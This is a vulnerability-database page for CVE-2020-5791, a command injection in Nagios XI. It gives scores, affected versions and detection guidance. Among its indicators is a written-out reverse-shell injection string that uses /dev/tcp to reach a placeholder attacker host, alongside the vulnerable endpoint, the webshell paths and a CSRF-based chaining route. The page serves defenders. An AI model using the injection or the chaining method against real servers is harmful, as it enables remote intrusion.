cbcvebase.
CVE-2020-5791
published 2020-10-20

CVE-2020-5791: Improper neutralization of special elements used in an OS command in Nagios XI 5.7.3 allows a remote, authenticated admin user to execute operating system…

PriorityP269high7.2CVSS 3.1
AVNACLPRHUINSUCHIHAH
EXPLOIT
EPSS
78.63%
99.5th percentile
Improper neutralization of special elements used in an OS command in Nagios XI 5.7.3 allows a remote, authenticated admin user to execute operating system commands with the privileges of the apache user.

Affected

2 ranges
VendorProductVersion rangeFixed in
nagiosnagios_xi
nagiosnagios_xi5.6.0 – 5.7.3

Detection & IOCsextracted from sources · hover to see the quote

url/nagiosxi/admin/mibs.php?mode=undo-processing&type=1&file=
path/nagiosxi/admin/mibs.php
path/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/scooby.php
path/nagiosxi/includes/components/autodiscovery/jobs/scooby.php
command;/bin/bash -c 'bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1';
path/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/snmplog.php
path/nagiosxi/includes/components/nxti/index.php
  • Detect exploitation attempts by monitoring HTTP requests to /nagiosxi/admin/mibs.php with query parameters mode=undo-processing and type=1, especially when the 'file' parameter contains shell metacharacters (e.g., semicolons, backticks, pipe characters, or encoded equivalents).
  • Alert on creation of unexpected PHP files under /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/, which is the webshell drop location used in the PoC.
  • Monitor for outbound reverse shell connections initiated by the apache/www-data process, particularly bash spawning TCP connections via /dev/tcp.
  • Detect HTTP GET requests to newly created webshell paths such as scooby.php or snmplog.php under the autodiscovery/jobs/ directory, especially with a 'cmd' query parameter.
  • For CVE-2020-5792 (chained attack), detect requests to /nagiosxi/includes/components/nxti/index.php with mode=customTrap and custom-community values containing -d and -L flags, which are used to write arbitrary files via snmptrap argument injection.
  • Monitor for the nxti_import.php script being invoked with unsanitized file arguments, as this is the direct exec() sink for the command injection.
  • ·Exploitation requires authentication as a Nagios XI admin user; unauthenticated exploitation is only possible when chained with the CSRF vulnerability CVE-2020-5790 via a phishing link sent to an authenticated admin.
  • ·The injected commands execute as the 'apache' or 'www-data' user (not root); the exact user depends on the NagiosXI version and underlying OS.
  • ·The vulnerable code path is only triggered when 'type' equals MIB_UPLOAD_PROCESS_ONLY (value 1); other type values exit early and are not exploitable via this vector.
  • ·The mibs.php endpoint lacks CSRF protection (check_nagios_session_protector() is not called), enabling unauthenticated chaining via social engineering.

CVSS provenance

nvdv3.17.2HIGHCVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.